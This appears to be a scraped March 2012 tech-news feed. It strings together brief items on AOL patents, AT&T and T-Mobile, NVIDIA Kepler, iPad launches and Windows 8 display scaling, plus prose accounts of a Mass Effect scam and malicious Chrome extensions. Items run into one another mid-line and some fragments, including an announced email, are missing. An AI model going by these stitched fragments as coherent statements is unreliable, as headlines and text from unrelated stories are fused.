Read the comments on this post
Marketers, when they hit, can identify the seed of a product, service or organization and plant it in fertile soil where it will grow like mad. They can tease out the implications of the object they're charged with publicizing or find the motif that others are most likely to riff on. But when they fail, they can fail in the most mortifying fashion. All around the country, the marketing staff at live performance spaces big and small are embracing the "youthquake" in the grooviest way I've seen in years. They are offering up "tweet seats" to the kids.
It is an operatically stupid idea.
Read the comments on this post
Chrome OS coming to ARM? originally appeared on Engadget on Sat, 24 Mar 2012 14:36:00 EDT. Please see our terms for use of feeds.
PermalinkAOL, a company that’s been struggling with shrinking sales over the last several years, may be looking for new sources of income. According to Bloomberg “three people with knowledge of the matter” said the company is hiring investment firm Evercore to find buyers or licensees for some of its more than 800 patents. The three sources also said Evercore would “explore other strategic options” for the company, without going into more detail.
Since 2009, when AOL separated from media content giant Time Warner, the web company has seen a 29 percent drop in revenue, according to Bloomberg. Part of this could be due to the ever-diminishing returns of AOL’s once ubiquitous dial-up service (subscription revenue from AOL's dial-up dropped 18 percent from 2010 to 2011). Earlier this month, AOL cut more than 40 employees from AIM, their Instant Messenger department.
The three anonymous sources also said that several private-equity firms have recently approached AOL about privatizing the company and buying out its shareholders, but that AOL has not yet made a deal with any other company. AOL’s CEO Tim Armstrong has said publicly that he would be open to going private, and was in talks with Yahoo as early as September, although no deal was initiated then, either.
Investment Bank MDB Captial Group said licensing some of its patents could earn AOL as much as $1 billion in licensing fees. A quick search of AOL’s patents reveals such prime intellectual property as “e-mail integrated instant messaging” which is included in most e-mail clients these days, a patent for “host based-intelligent results related to a character stream” much like Google search’s auto-complete, and a “system for automated translation of speech” similar to a system developed by Microsoft and shown off earlier this year. Large companies like Google and Microsoft might be potential buyers for such patents in order to prevent infringements on alternative ways of developing products similar to theirs, or simply to avoid patent lawsuits down the road.
Evercore has been hired by companies like McGraw Hill, mortgage insurer PMI, and the airline Northwest Air, to find buyers for portions of the companies or to assist with restructuring.
Read the comments on this post
Bowing to pressure from travelers, the FAA has decided to "revisit" the de facto ban on the use of gadgets during take-off and landing. Depending on the outcome of this re-examination of the rules, the future may well allow us to remain glued to our screens for an extra fifteen minutes at each end of a flight. But is this really a future we should be welcoming?
While nothing will change in the immediate future, this "revisit" opens the door to end-to-end gadgetry: if the rules change we will be glued to our screens from the moment we first take our undersized and uncomfortable seats right until the time the pod bay doors are opened and we escape our flying sardine cans.
I think this is a step backwards, and that the pressure that the FAA is under is a sad reflection on modern life.
Read the comments on this post
Continue reading Apogee MiC review
Apogee MiC review originally appeared on Engadget on Sat, 24 Mar 2012 13:00:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsThe new UI shouldn’t come as a surprise to anyone. There is a clear effort at Apple to make everything match the look and feel of their popular iOS products – starting with Lion and increasing momentum with Mountain Lion.
To be clear – he didn’t like the original grid. This was before the iPhone was popular and before the iPad even existed.
Given that the iPad is far more successful than the AppleTV, migrating the AppleTV to look more like the iPad was probably a very smart move – even if some of the users of the old UI don’t prefer the new one.
Steve rejecting a design five years ago isn’t a huge deal. Steve was well known for rejecting ideas, tweaking them, and turning them into something even better. And that’s a very good thing. One of my favorite parts of working at Apple was knowing that SJ said “no” to most everything initially, even if he later came to like it, advocate for it, and eventually proudly present it on stage. This helped the company stay focused and drove people to constantly improve, iterate, and turn the proverbial knob to 11 on everything.
What at first seemed like a relatively benign story about Internet protests over the ending of Mass Effect 3 became an enduring story this week, with Bioware publicly addressing the complaints very respectfully amid growing furor. Also this week, EA announced server shutdowns for over a dozen of its online games, including some that were released relatively recently.
We're starting to gear up for PAX East in Boston these days. Anyone got any recommendations for either the show or the surrounding cityscape?
Read the comments on this post
RIM putting BlackBerry 10 test units in developers' hands in May originally appeared on Engadget on Sat, 24 Mar 2012 11:36:00 EDT. Please see our terms for use of feeds.
Permalink |Pixel-pumping prowess: Ars reviews the third-generation iPad: Extra memory, faster chips, a huge new battery—the third-generation iPad needs them all to drive its high-resolution screen.
Apple to announce plans for $100 billion cash pile on Monday: Apple made a surprise announcement saying it would make public its plans for its nearly $100 billion cash hoard.
Read the comments on this post
Last weekend saw the return of Weird Science, which barely snuck on to our list of the top stories. It faced fierce competition from a number of stories on energy—the cost of coal, efficient LEDs, the displacement of fossil fuels, and a new method of making solar panels. Our most detailed look yet at the planet Mercury also proved to be very popular.
Read the comments on this post
Pirate Bay plans to build aerial server drones with $35 Linux computer: The Pirate Bay has announced plans to build a fleet of flying server drones using the Raspberry Pi ARM board. The airborne computers will reportedly be more difficult for law enforcement agencies to terminate.
Facebook says it may sue employers who demand job applicants' passwords: After an alarming increase in reports of employers demanding Facebook usernames and passwords, Facebook said it is willing to take legal action.
Read the comments on this post
Chevrolet replacing 120-volt power cords on most Volt automobiles originally appeared on Engadget on Sat, 24 Mar 2012 08:43:00 EDT. Please see our terms for use of feeds.
PermalinkWhite House cybersecurity adviser Howard Schmidt discusses the implications of bring-your-own device policies, as well as how intelligence agencies and businesses could share more information
Epic Mickey 2 controllers invoke the power of the brush, are made for you and me originally appeared on Engadget on Sat, 24 Mar 2012 06:28:00 EDT. Please see our terms for use of feeds.
Permalink |Huawei Fusion hits AT&T's GoPhone lineup, prepaid Gingerbread for $125 (update) originally appeared on Engadget on Sat, 24 Mar 2012 04:17:00 EDT. Please see our terms for use of feeds.
PermalinkNVIDIA CEO suggests Kepler GPUs could be headed to future 'superphones' originally appeared on Engadget on Sat, 24 Mar 2012 01:54:00 EDT. Please see our terms for use of feeds.
PermalinkMotorola Connected Home Gateway home automation all-in-one hits the FCC with Verizon tags originally appeared on Engadget on Fri, 23 Mar 2012 23:33:00 EDT. Please see our terms for use of feeds.
Permalink |Continue reading Permoveh personal vehicle prototype can travel sideways, diagonally (video)
Permoveh personal vehicle prototype can travel sideways, diagonally (video) originally appeared on Engadget on Fri, 23 Mar 2012 21:58:00 EDT. Please see our terms for use of feeds.
PermalinkUS Army debuts app marketplace prototype: iOS first, Android coming soon originally appeared on Engadget on Fri, 23 Mar 2012 20:33:00 EDT. Please see our terms for use of feeds.
Permalink |Continue reading FCC Fridays: March 23, 2012
FCC Fridays: March 23, 2012 originally appeared on Engadget on Fri, 23 Mar 2012 19:00:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsXbox 360's Comcast Xfinity TV app in beta testing, won't count against data caps when it launches originally appeared on Engadget on Fri, 23 Mar 2012 17:33:00 EDT. Please see our terms for use of feeds.
PermalinkRdio inks deal to license UK music, but doesn't offer up a visit date originally appeared on Engadget on Fri, 23 Mar 2012 17:01:00 EDT. Please see our terms for use of feeds.
PermalinkAT&T has issued an I-told-you-so press release addressing the T-Mobile layoffs announced Friday, asserting that they wouldn't have happened if the FCC had just let AT&T buy T-Mobile. Jim Cicconi, AT&T's senior executive vice president of external and legislative affairs, said in the statement that T-Mobile's recent misfortune demonstrates the need for more "regulatory humility," and that "the truth of who was right is sadly obvious." AT&T is referring, of course, to itself.
While AT&T was trying to acquire T-Mobile, the company asserted that the merger would create many jobs, a claim that the FCC and the US Department of Justice refused to believe. In fact, the FCC stated in its own report that the merger would create a "net loss of direct jobs."
T-Mobile stated Friday that it plans to close seven call centers and cut 1,900 jobs. In AT&T's press release, Cicconi said that the company planned specifically to protect "these very same small call centers and jobs if our merger was approved," and that the job loss has proven the FCC made the wrong choice.
Of course, the FCC's and DoJ's real concern was that the reduction in competition that the merger would have created. Four billion dollars later, AT&T is apparently still smarting at their decision.
Editor's Update: Friday evening, a spokesperson for the FCC sent an e-mail to All Things D flatly denying claims made by AT&T's petulant press release, saying "The bottom line is that AT&T’s proposal to acquire a major competitor was unprecedented in scope and the company’s own confidential documents showed that the merger would have resulted in significant job losses." The spokesperson did not elaborate on the details of those confidential documents.
Read the comments on this post
Apple updates iTunes Movie Trailers app, lets your Retina watch high-res teasers originally appeared on Engadget on Fri, 23 Mar 2012 16:25:00 EDT. Please see our terms for use of feeds.
PermalinkValcom, a company that makes automatic voice paging systems that function over analog and IP lines is suing Megaupload.com for copyright damages, saying that a “significant number” of its more than 6,000 audio and video titles were distributed illegally through the file-sharing site. Valcom's clients include school, government, and transportation systems, which use the company's recordings in the event of emergencies or as background easy-listenin' music in brick-and-mortar waiting areas.
Megaupload was a popular cyberlocker seized by the Feds in January for criminal copyright infringement, money laundering, and racketeering.
The recording company stated in a press release that it had filed a suit against Megaupload, which had an associated shell company responsible for causing "an estimated half-billion dollars in copyright losses" altogether, noting that cases of willful copyright infringement can result in damages ranging from $750 to $150,000 per copyright infringed. Valcom's legal counsel will seek a slice of some of the millions of dollars seized by government authorities for each of the copyrights that Valcom can prove were infringed upon.
The Next Web suggests that Valcom could sue for as much as $900 million in damages if all 6,000 titles were infringed upon and if the company could make the case that each copyright merited a $150,000 remittance, but the actual number Valcom seeks will most likely be much lower than that, as Valcom only claims a portion of its copyright library was used illegally. Ars contacted Valcom but did not receive an immediate response.
Valcom's claim may be only the first in a flurry of suits against Megaupload seeking recompense for alleged lost profits, and only the start for Valcom's new "aggressive initiative to acquire back-due royalties and compensation... for the benefit of the Company and to increase value for our shareholders," according to a statement made by Vince Vellardita, President and CEO of Valcom.
Read the comments on this post
Listen to the Engadget Mobile Podcast at 5PM ET, with special guest Sascha Segan! originally appeared on Engadget on Fri, 23 Mar 2012 16:01:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsMOG opens its doors to Windows with new desktop application originally appeared on Engadget on Fri, 23 Mar 2012 15:46:00 EDT. Please see our terms for use of feeds.
PermalinkContinue reading Insert Coin: Galileo, the remote control camera from the men behind the Gorillapod
Insert Coin: Galileo, the remote control camera from the men behind the Gorillapod originally appeared on Engadget on Fri, 23 Mar 2012 15:33:00 EDT. Please see our terms for use of feeds.
Permalink |Where there is passion on the internet, there is someone who seeks to exploit it. Thus, in the wake of the massive fan-driven controversy surrounding the ending of Mass Effect 3, a new scam has been unearthed that seeks to trick users into clicking on affiliate advertising offers in exchange for a download of a supposed "new ending."
The spam email, as uncovered by GFI, directs users to download a ZIP file containing a password-protected downloader for the supposed new ending. A text file inside the ZIP instructs downloaders to go to a web site where they're asked to take part in one of a number of shady offers to get access to the supposed password.
"Last Mass Effect 3 Ending, was really bad, but here, you have NEW, EXCITING ENDING," reads the download page. "You only need, to downlad [sic], and run it, downloader will automacitally [sic] start, download, new ending files, you will like it!"
You'd think obvious misspellings like "automacitally" and the generally poor grammar would raise the warning bells for users even remotely familiar with internet security, but nevertheless the download link has attracted at least a few hundred gullible players since its first appearance, according to publicly displayed statistics.
Recently, Bioware told fans they would be working to address the rampant criticism of the Mass Effect trilogy's vague ending with new downloadable content that will help answer lingering questions. However, the official DLC will not be available until April, and will likely only be available on Xbox Live, the PlayStation Network, and Origin (EA's download service.) Even then, it's unclear whether the new content will significantly change the game's existing ending or merely add new context an explanation to the existing narrative.
Read the comments on this post
Earlier this week, legislators in Tennessee approved a bill that singles out public school science education for special attention. Now, the Oklahoma House has passed a very similar bill that attacks an identical range of subjects that the legislation deems controversial: biological evolution, the chemical origins of life, global warming, and human cloning.
Both bills contain identical language, saying they "shall not be construed to promote any religious or nonreligious doctrine." There's also identical language about how they're intended to "help students develop critical thinking skills they need in order to become intelligent, productive, and scientifically informed citizens." However, the subjects they target are not areas where there are significant scientific controversies; either the bills' sponsors are poorly informed (and thus shouldn't be injecting themselves into science education), or they have non-educational goals in mind.
In any case, the legislators want to do what they can to enable science teachers to teach the controversy. To that end, they're basically attempting to block any educational authority—school board, principal, the state board of education—from punishing a teacher for covering the "scientific strengths and scientific weaknesses of existing scientific theories." The Oklahoma bill goes a bit further, adding protections for students who choose voice their disagreements with the science in any medium.
Given the staggering amount of scientific-sounding misinformation available on topics like evolution and climate change, these bills are a recipe for chaos in the science classrooms. It's a chaos that state legislators are inviting local school districts to sort out at great expense via lawsuits.
Read the comments on this post
Filed under: Podcasts
Engadget Podcast 286 - 03.23.2012 originally appeared on Engadget on Fri, 23 Mar 2012 15:08:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsA control scheme for a game is like the foundation for a house. If it's constructed well, it serves its purpose largely in the background, providing unseen support for the part that people see. But if there's a problem with either a game's control scheme or a house's foundation, it can easily sink the rest of the enterprise, no matter how well it's constructed.
Such is the case with Kid Icarus: Uprising, an imaginative, lighthearted, fun-filled game that ultimately falls on the weakness of some incredibly ill-conceived controls.
Read the comments on this post
Sony VAIO VCC111 Chromebook passes through FCC, Chrome OS flies its flag originally appeared on Engadget on Fri, 23 Mar 2012 14:41:00 EDT. Please see our terms for use of feeds.
PermalinkThis waif of a tablet certainly took its sweet time getting here. We first laid eyes on this lightweight beauty last August and while it still hasn't landed in the US just yet (under the guise of the Excite 10 LE) we've brought in the international version -- already in stores in the UK -- to test out the hardware, which appears to be identical. On first appearances, it's an attractive sliver of a slab, due to the magnesium alloy body, of which there isn't much. Measuring in at just 7.7mm thick, we're talking RAZR-scale thinness and a 1.18 pound weigh-in that embarrasses 7-inch devices. Despite this, we still have a 1.2GHz dual-core OMAP processor, running Honeycomb 3.2 on a 10.1 inch touchscreen. But surely, sacrifices must have been made, right? Well, it looks like it's a financial cost that has to be paid. The 16GB version is currently on sale for £399, matching the new iPad in the UK, and likely to arrive in the US at around $530, pricing itself quite a bit above existing, similarly-specced, Android favorites like the Galaxy Tab 10.1. Are you willing to pay a fair chunk of change extra to skim a few millimeters off your tablet profile? Is it worth it? The full story is right after the break.
Continue reading Toshiba AT200 review
Toshiba AT200 review originally appeared on Engadget on Fri, 23 Mar 2012 14:00:00 EDT. Please see our terms for use of feeds.
Permalink | | Email this | CommentsDigital gaming soars nine percent, still knows nothing of rarity value originally appeared on Engadget on Fri, 23 Mar 2012 13:36:00 EDT. Please see our terms for use of feeds.
PermalinkIt was absurd, he added that American classrooms were still based on teachers standing at a board and using textbooks. All books, learning materials, and assessments should be digital and interactive, tailored to each student and providing feedback in real time.Jobs wanted to hire great textbook writers to create digital versions, and make them a feature of the iPad. He wanted to make textbooks free and bundled with the iPad, and believed such a system would give states the opportunity to save money.
Since November 2011, according to recent statistics, Google Chrome has become the most popular browser in Brazil (more than 45% of the market share).
The same has is true for Facebook, which now is the most popular social network in Brazil, with a total of 42 million users, displacing Orkut.
These two facts are enough to motivate Brazil’s bad guys to turn their attentions to both platforms. This month we saw a huge wave of attacks targeting Brazilian users of Facebook, based on the distribution of malicious extensions. There are several themes used in these attacks, including “Change the color of your profile” and “Discover who visited your profile” and some bordering on social engineering such as “Learn how to remove the virus from your Facebook profile”:
1) Click on Install app, 2) Click on Allow or Continue, 3) Click on Install now, After doing these steps, close the browser and open again
This last one caught our attention not because it asks the user to install a malicious extension, but because the malicious extension it’s hosted at the official Google's Chrome Web Store. If the user clicks on “Install aplicativo” he will be redirected to the official store. The malicious extension presents itself as “Adobe Flash Player”:
Facebook is trying to expand its trademark rights over the word "book" by adding the claim to a newly revised version of its "Statement of Rights and Responsibilities," the agreement all users implicitly consent to by using or accessing Facebook.
You may recall that Facebook has launched multiple lawsuits against websites incorporating the word "book" into their names. Facebook, as far as we can tell, doesn't have a registered trademark on "book." But trademark rights can be asserted based on use of a term, even if the trademark isn't registered, and adding the claim to Facebook's user agreement could boost the company's standing in future lawsuits filed against sites that use the word.
Read the comments on this post
So to sum up, iPhone 5,1 is on track for:iMore had previously reported that they believe the new iPhone will carry a miniaturized dock connector to help reduce the overall size of the iPhone, itself.
- Similar if not same sized screen (currently 3.5-inch but not set in stone)
- 4G LTE radio
- New “micro dock” connector
- Fall/October 2012 release
The Xperia S is a large and somewhat ungainly smartphone with a superb screen and some high-end features. However, it's severely let down by its lack of storage expansion and sealed-in battery.
(ZDNet UK - Smartphones)
Nokia has updated its core navigation apps for its Lumia handsets, bringing new features such as full offline voice-guided navigation, public transport directions and speed limit warnings
(ZDNet UK - Mobile Apps)
A source with access to the latest Mountain Lion preview alerted Ars that double-sized graphics have popped up in some unexpected places, once again suggesting that Apple may be close to releasing MacBooks with high pixel-density screens.We'd previously spotted these same Retina-sized graphics in the Lion beta of Apple's new Messages application.
Virgin Media Business, BT and KCom are among the dozen companies that successfully bid to become suppliers of managed telecoms for the public sector's network of networks
The stock crashed 9% to $542.80 before trading was stopped. When the stock started trading again, it opened at $598.39Trading has since resumed, but there has been no clarification on what happened. StreetInsider speculates that it was "an apparent errant trade".
A single trade for 100 shares executed on a Bats venue briefly sent Apple, the world’s most valuable company, down to $542.80, triggering a circuit breaker that paused the shares. The order was executed at 10:57 a.m. New York time. Two more transactions, which sent the stock back above $598, were made before the halt. The stock stayed around that level once trading resumed.
Edges out UNIX
"I've made thousands of sketches and hundreds of prototype products (for the Galaxy). Does that mean I was putting on a mock show for so long, pretending to be designing?"Lee admits that he may not be at the level of Apple's VP for design Jonathan Ive, but believes Samsung "will produce such iconic products one day."
"As a designer, there's an issue of dignity. (The Galaxy) is original from the beginning, and I'm the one who made it. It's a totally different product with a different design language and different technology infused."
“Apple Stores and the Apple Web site are tremendously productive, but they are limited by their relatively small retail footprint,” CIRP’s Josh Lowitz told AllThingsD. “There are four times as many Best Buy stores, and probably 20 times as many AT&T, Verizon, and Sprint stores, so aggressive distribution through all these channels is critical to Apple’s U.S. strategy.”
Recent Mac and iOS Blog Stories
• Apple Loses Appeal in Italian Warranty Disclosures Case
• Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
• Some Smart Covers Not Working Properly on New iPad
• Angry Birds Space Launches on iOS and Mac
• More '4G' Strings Found in iOS 5.1
The iPad port will include all the improvements and additions found in the PC version, including full integration of the Tales of the Sword Coast expansion pack. The title is also running on the refined Baldur's Gate II Infinity Engine, allowing gamers to experience the original adventure with the sequel's refined graphics options and other engine tweaks.IGN reports that the new version of thegame will feature new content, more quests and a new party member. The early build of the iPad version runs smoothly though the interface has not yet been revamped to be more touch friendly. Those changes are still in the works, though pinch and zoom has already been implemented. The iPad version is expected to launch this summer.
Government services will be online by default in the future, and must be easy enough for the minister responsible to use, under new measures announced in the 2012 UK Budget
If manufacturers follow suit, Windows 8 tablets and hybrids will sport displays that rival, or exceed, the Retina Display on Apple's new iPad, Microsoft has said
(ZDNet UK - Desktop OS)
In this article, I explore how OpenBSD's clean code and sane defaults recently saved the day. For great science!It's no secret that OpenBSD is an excellent research platform. From packages(7) for specialised software to out-of-the-box httpd(8), sshd(8), and so on, it's a no-brainer to pop OpenBSD onto a workstation and just get to work.
The road to any new microprocessor design is by no means simple. Planning for a major GPU like NVIDIA's Kepler starts four years prior to the chip's debut. In a world that's increasingly more focused on fast production and consumption of everything, it's insane to think of any project taking such a long period of time.
Chip planning involves figuring out what you want to do, what features you want, what the architecture should look like at a high level, etc... After several rounds of back and forth in the planning stage, actual architecture work begins. This phase can take a good 1 - 1.5 years depending on the complexity of the design. Add another year for layout and validation work, then a 6 - 9 month race from tape out to products on shelves. The teams that spend years on these designs are made up of hard working, very smart people. They all tend to believe in what they're doing and they all show up trying to do the best job possible.
Unfortunately, picking a target that's 4 years out and trying to hit it better than your competition is extremely difficult. You can put in an amazing amount of work, push through late nights, struggle with issues, be proud of what you've done and still fall short. We've seen this happen to companies on both sides of the fence, whether we're talking CPUs or GPUs, you win some and you lose some.
Today NVIDIA unveiled Kepler, a more efficient 28nm derivative of its Fermi architecture. The GeForce GTX 680 is the first productized Kepler for the desktop and if you read our review, it did very well. As our own Ryan Smith wrote in his conclusion to the GeForce GTX 680 review:
"But in the meantime, in the here and now, this is by far the easiest recommendation we’ve been able to make for an NVIDIA flagship video card. NVIDIA’s drive for efficiency has paid off handsomely, and as a result they have once again captured the performance crown."
We've all heard stories about what happens inside a company when a chip doesn't do well. Today we have an example of what happens after years of work really pay off. A trusted source within NVIDIA forwarded us a copy of Jen-Hsun's (NVIDIA's CEO) email to all employees, congratulating them on Kepler's launch. With NVIDIA in (presumably) good spirits today, I'm sure they won't mind if we share it here.
If you ever wondered what it's like to be on the receiving end of a happy Jen-Hsun email, here's your chance:
Starting March 23 the new iPad will be available in Austria, Belgium, Bulgaria, Czech Republic, Denmark, Finland, Greece, Hungary, Iceland, Ireland, Italy, Liechtenstein, Luxembourg, Macau, Mexico, The Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Slovakia, Slovenia, Spain and Sweden.The 3rd Generation iPad launched in 10 countries including the U.S. last Friday and is now expanding further internationally. The iPad is available for online order with 1-2 week delivery delays.
The weakness is caused due to an error within the handling of URLs when using javascript's window.open() method. This can be exploited to potentially trick users into supplying sensitive information to a malicious web site, because information displayed in the address bar can be constructed in a certain way, which may lead users to believe that they're visiting another web site than the displayed web site.
Last month, a developer of applications ("apps") for Apple's mobile devices discovered that the social networking app Path was accessing and collecting the contents of his iPhone address book without having asked for his consent. Following the reports about Path, developers and members of the press ran their own small-scale tests of the code for other popular apps for Apple's mobile devices to determine which were accessing address book information. Around this time, three other apps released new versions to include a prompt asking for users' consent before accessing the address book. In addition, concerns were subsequently raised about the manner in which apps can access photographs on Apple's mobile devices.The developers are given until April 12, 2012 to respond.
We are writing to you because we want to better understand the information collection and use policies and practices of apps for Apple's mobile devices with a social element. We request that you respond to the following questions:
(1) Through the end of February 2012, how many times was your iOS app downloaded from Apple's App Store?
(2) Did you have a privacy policy in place for your iOS app at the end of February 2012? If so, please tell us when your iOS app was first made available in Apple's App Store and when you first had a privacy policy in place. In addition, please describe how that policy is made available to your app users and please provide a copy of the most recent policy.
(3) Has your iOS app at any time transmitted information from or about a user's address book? If so, which fields? Also, please describe all measures taken to protect or secure that information during transmission and the periods of time during which those measures were in effect.
(4) Have you at any time stored information from or about a user's address book? If so, which field? Also, please describe all measures taken to protect or secure that information during storage and the periods of time during which those measures were in effect.
(5) At any time, has your iOS app transmitted or have you stored any other information from or about a user's device - including, but not limited to, the user's phone number, email account information, calendar, photo gallery, WiFi connection log, the Unique Device Identifier (UDID), a Media Access Control (MAC) address, or any other identifier unique to a specific device?
(6) To the extent you store any address book information or any of the information in question 5, please describe all purposes for which you store or use that information, the length of time for which you keep it, and your policies regarding sharing of that information.
(7) To the extent you transmit or store any address book information or any of the information in question 5, please describe all notices delivered to uscrs on the mobile device screen about your collection and use practices both prior to and after February 8, 2012.
(8) The iOS Developer Program License Agreement detailing the obligations and responsibilities of app developers reportedly states that a developer and its applications "may not collect user or device data without prior user consent, and then only to provide a service or function that is directly relevant to the use of the Application, or to serve advertising.";
(a) Please describe all data available from Apple mobile devices that you understand to be user data requiring prior consent from the user to be collected.
(b) Please describe all data available from Apple mobile devices that you understand to be device data requiring prior consent from the user to be collected.
(c) Please describe all services or functions for which user or device data is directly relevant to the use of your application.
(9) Please list all industry self-regulatory organizations to which you belong.
"We will be launching our music service on iOS in the next few weeks," said Layden, who was speaking at the IP&TV World Forum with TechRadar in attendance.Music Unlimited is Sony's on-demand all you can listen to music service that costs $9.99 a month. Sony claims to have a global catalog of over 10 million songs that you can listen to on your computer, Android phone, Sony Enabled device, and soon, iOS device. They offer unlimited skips and no ads for the paid service.
"We want to be on as many devices for users who want to be part of Music Unlimited."
MIT researchers have developed a camera system that uses reflected laser light to 'see' and build 3D images of objects that are out of line-of-sight
In an email exchange with iLounge, DisplayMate President Ray Soneira indicated that the third-generation iPad—when connected to power via the included Apple 10W Power Adapter—actually continued to draw 10W of power for up to one hour after reaching what is reported by iOS as a full 100% chargeiLounge found in their battery testing of the new iPad that sometimes the charge would drop initially quickly when they thought the iPad was fully charged.
The country is making headway on a pilot scheme to move public-sector bodies from proprietary to free and open-source software, though Oracle and other products could create hurdles
RIM, based in Waterloo, Ontario, shipped 2.08 million BlackBerrys last year in Canada, compared with 2.85 million units for Apple, data compiled by IDC and Bloomberg show. In 2010, the BlackBerry topped the iPhone by half a million, and in 2008, the year after the iPhone’s debut, RIM outsold Apple by almost five to one.RIM has been on a decline since the launch of the iPhone and Android platforms with sales and profits dropping. RIM's worldwide numbers have been dropping precipitously in contrast to significant grown from iOS and Android.
Microsoft's David Washington has penned another informational tome on the Building Windows 8 blog, this one about Windows 8 and its support for varying screen resolutions. The above chart lists the common (but not the only) resolutions that Microsoft is planning for, and while most of the listed display types won't surprise anyone (wall-to-wall 1366x768 and 1920x1080 for most desktops and laptops), it does appear as though Microsoft is planning for Windows tablets with a DPI that approaches or matches that of the new iPad.
Microsoft is planning for tablets that use both the 1024x768 and 1366x768 resolutions common in earlier and lower-end tablets as well as the high-DPI screens that are being (and will be) ushered in by the new iPad. To scale Windows elements so that they're still comfortable to look at and touch at these resolutions, Microsoft has put together some pre-defined scaling percentages: 100% when no scaling is applied, 140% for 1080p tablets, and 180% for quad-XGA tablets like the new iPad. These percentages were all chosen as "pixel density sweet spots" for 10" and 11" tablets with 1920x1080 or 2560x1440 displays. It should be noted that Washington's blog post focused entirely on Metro scaling - whether the Windows desktop will automatically scale using these percentages is unclear.
Microsoft's attention to these specific resolutions suggests that we will probably see some high-DPI Windows tablets when they launch in the fall, though we still don't know anything about the tablets OEMs are designing for Windows 8 and Windows on ARM. It's also telling that there are no 7" tablets on that chart - we may not see Windows versions of smaller tablets like the Kindle Fire or Nook Tablet.
Washington went on to explain the reasoning behind the minimum resolution requirements for Metro apps that we noticed in our Windows 8 preview review - 1024x768 for Metro apps and 1366x768 for the Metro Snap feature. Both choices were largely developer and data-driven: 1024x768 is a common low-end resolution for web developers and tablet app developers, and Microsoft didn't want to restrict these developers to a lower minimum resolution to account for the small percentage of 800x600 and 1024x600 displays that are currently in use.
As for snapped apps: the size for a "snapped" app is always 320 pixels wide, which was again selected because developers have become used to it in their work with smartphones. A 1366x768 display is the lowest common screen resolution that allows for the 320 pixel width and the 1024 pixel minimum width for regular Metro apps.
Also discussed was the methods by which Metro allows programs to expand to take up all of the pixels in a larger laptop or desktop display: To help dynamically expand content to take up more screen space when the pixels are available, Windows 8 uses the same XAML and CSS3 features that are commonly used to accomplish this on modern web pages - examples of such features include the grid, flexible box, and multi-column CSS3 layouts. App templates provided with Visual Studio 11 all make use of these features automatically. Developers can also scale their apps to fit larger displays, which is useful for games or other apps that don't need to make use of additional pixels.
For more, including Windows 8's support for scalable graphics and the Windows Simulator tool that will provide Visual Studio 11 users the ability to test their apps at multiple screen resolutions, the full post is linked below for your convenience.
Source: Building Windows 8 blog
The method may begin by obtaining an input that may be used to identify the electronic device that is to be controlled, such as by using image processing techniques to compare the captured image against a database of known devices.Apple acknowledges the iPhone in question would also need IR transmission capabilities. The patent application is dated from 2010.
Mistake in the release matrix
“How do you follow up on Fermi?” That’s the question we had going into NVIDIA’s press briefing for the GeForce GTX 680 and the Kepler architecture earlier this month. With Fermi NVIDIA not only captured the performance crown for gaming, but they managed to further build on their success in the professional markets with Tesla and Quadro. Though it was a very clearly a rough start for NVIDIA, Fermi ended up doing quite well in the end.
So how do you follow up on Fermi? As it turns out, you follow it up with something that is in many ways more of the same. With a focus on efficiency, NVIDIA has stripped Fermi down to the core and then built it back up again; reducing power consumption and die size alike, all while maintaining most of the aspects we’ve come to know with Fermi. The end result of which is NVIDIA’s next generation GPU architecture: Kepler.
Launching today is the GeForce GTX 680, at the heart of which is NVIDIA’s new GK104 GPU, based on their equally new Kepler architecture. As we’ll see, not only has NVIDIA retaken the performance crown with the GeForce GTX 680, but they have done so in a manner truly befitting of their drive for efficiency.
While the desktop-bound GeForce GTX 680 is undoubtedly the most exciting release from NVIDIA today and the true flagbearer for their new Kepler microarchitecture, NVIDIA actually has a whole host of releases ready to go on the notebook front. We've already had a chance to check out the GeForce GT 640M in action, but it's far from the only member of the old/new GeForce 600M series. Today we have details on their complete 600M series from top to bottom; some of it is exciting and new, and some of it is just the GPU industry up to its same old marketing tricks. Read on for the full details.
Ice Cream Sandwich is on the way
Asus's Transformer Prime just got some company. Available for pre-order today, the Acer Iconia Tab A510 brings the price of entry for a 10.1" Tegra 3-powered tablet down to a cool $449.99, $50 less than the similarly equipped Asus offering. Like the Prime the A510 features a 10.1" 1280x800 display, the 1.3 GHz Tegra 3 SoC with 1 GB of RAM and 32 GB of storage expandable by microSD. The base battery life on the A510 is an impressive 36.26Whr, not quite as much as the new iPad, but somewhat higher than its prececessor and the Prime. That big battery does lead to a somewhat portly frame, with a thickness cresting a centimeter and weighing nearly 100g more than the Prime. The frame is similar to the A200 we saw in January, but is actually a little thinner and with a textured back for extra grip.
Android 4.0 is on order for software, complete with Acer's Ring UI, a relatively innocuous skin that mainly seeks to put your most commonly used apps in easy reach. When we took a look at the A500, we were pleased with its display quality, not quite IPS but great for a vanilla LCD; we hope we can expect more of the same from this display. Software pre-load includes the usual branded media players and print software, along with Polaris Office 3.5 for productivity. Gone though, is the full-sized USB port, replaced by microUSB, though it remains compatibile with portable HDD up to 2TB in size.
There's no shortage of options for tablet buyers right now, and everyday another pops up. But if performance, battery life and price are your main criteria, the A510 may just be the tablet for you. Pre-orders start today for $449.99 at your favorite e-tailers; no ship dates are available.
The agency, dedicated to running large EU-wide IT systems, has officially begun work in Estonia, and will initially focus on databases related to visas and fingerprints, with other systems likely to follow
(ZDNet UK - Regulation)
The HTC Eternity is the first Windows Phone to be sold in China, and comes with a version of the operating system tailored to Chinese characters
Apple is lining up extra votes in the European Telecommunications Standards Institute, reports say, as it seeks to get backing for its new nano-SIM standard
While more than 80 percent of the data breaches in 2011 were due to organised criminal activity, the number of records pilfered by activist groups represented 58 percent of the total, a new report has found
We've known about Cedar Trail for quite a while now, the next iteration of Intel's Atom processor line. As far as the CPU is concerned, not a lot has changed from the previous generation Pine Trail. Cedar Trail is manufactured on Intel's 32nm process technology, but the CPU architecture is still in-order. You can read more of our Cedar Trail coverage in our initial look at the platform. It's taken far longer than expected, but we finally got someone to send us a Cedar Trail netbook for review. That someone is ASUS, and the netbook is their 1025C.
